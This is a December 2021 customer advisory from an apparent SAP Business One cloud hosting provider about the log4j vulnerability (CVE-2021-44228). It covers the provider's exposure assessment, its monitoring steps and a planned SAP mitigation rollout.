Everything you need to know about how the log4j vulnerability affects SAP and SMB Solutions Cloud users
Posted Thursday, December 16th, 2021.
On Friday, December 10, 2021, news of active exploitation of a previously unknown zero-day vulnerability (CVE-2021-44228) in a common component of java-based software, referred to as log4j, became widely known.
The extent to which this software package is integrated into the world’s technologies and platforms is still being discovered, making response a fluid activity for any security program.
Situation Report
SMB Solutions Cloud Services has not assessed any material exposure to the log4j vulnerability that would impact the safe use of our products at this time.
Should this assessment change, we will update partners and customers immediately.
SMB Solutions has leveraged the intervening hours since the public disclosure of the exploitation to mount a comprehensive assessment and response.
This includes checking with critical vendors such as Sophos, Datto, Microsoft, SUSE and of course SAP for their current guidance and status of products deployed in the SMB Solutions Cloud Services environment.
We have raised this as a matter of urgency with senior SAP executives in light of the high level of usage of Apache and Java components in SAP Business One and associated solutions such as SAP HANA, B1i and SAP Business One Server Tools and will share any relevant responses with you, our partners, as we receive them
The log4j Vulnerability
For those who remember, this log4j vulnerability will invoke memories of ShellShock in 2014. Drawing on that analogy, you can conclude that this log4j vulnerability is potentially the most impactful critical vulnerability that we have seen this year.
The exploitation of the vulnerability requires a single HTTP request containing malicious input from anywhere in the world, to an internet-facing server that is running a vulnerable instance of log4j. The result is a full system compromise, and the exploit requires no authentication. This is as bad as it comes, especially given how widely this common software component is deployed.
At this time, others in the security community have done fantastic work writing up how the vulnerability works. Please review the comprehensive write-ups released by CloudFlare and SANS Internet Storm Center if this is something that interests you at a detailed level.
Vulnerability Response
Our Security Operations team have:
- confirmed that in place logging is sufficient to observe malicious requests
- started creating new alerting rules to triage scan events in real-time
- confirmed all scan activity was not successful; did not result in C2 domain resolution or outbound connections
We have undertaken initial scans to identify any potential areas of risk and continue to work with our software partners to take any necessary steps to mitigate these risks.
SAP Business One Mitigation Update
We have received a number of mitigation steps from SAP in the last 12 hours (as at 22:00 AEST December 16th) relating to SAP Business One which we will be deploying this coming weekend as a number of these mitigation steps require restarting of SAP components which may cause a number of short outages of 10 minutes each.
You can find the document located here – 3131789 – Mitigate Log4j CVE-2021-44228 Vulnerability in SAP Business One – SAP ONE Support Launchpad (SAP S Number authentication may be required)
We will communicate these via our status.smbsolutions.com.au page
Looking Forward
The days and weeks ahead will be challenging as exploits mature and evolve, more becomes known about common technologies that have this vulnerability embedded within them, and more third-party disclosures come out regarding technology susceptibility.
It is reasonable to predict that mass exploitation will occur in the near future. It is also likely that ransomware affiliate groups will include this exploit in their playbooks and ransomware threat actors will embed exploitation of this vulnerability into their malware kits.
The good news is that we and our security vendors continue to take action and invest heavily to combat these malicious actors. You can rest assured that the SMB Solutions Cloud Services team continues to remain vigilant against these threats.
If you have any concerns regarding this or any other aspect of your relationship with SMB Solutions Cloud Services, please feel free to reach out to Richard or any of the support team here.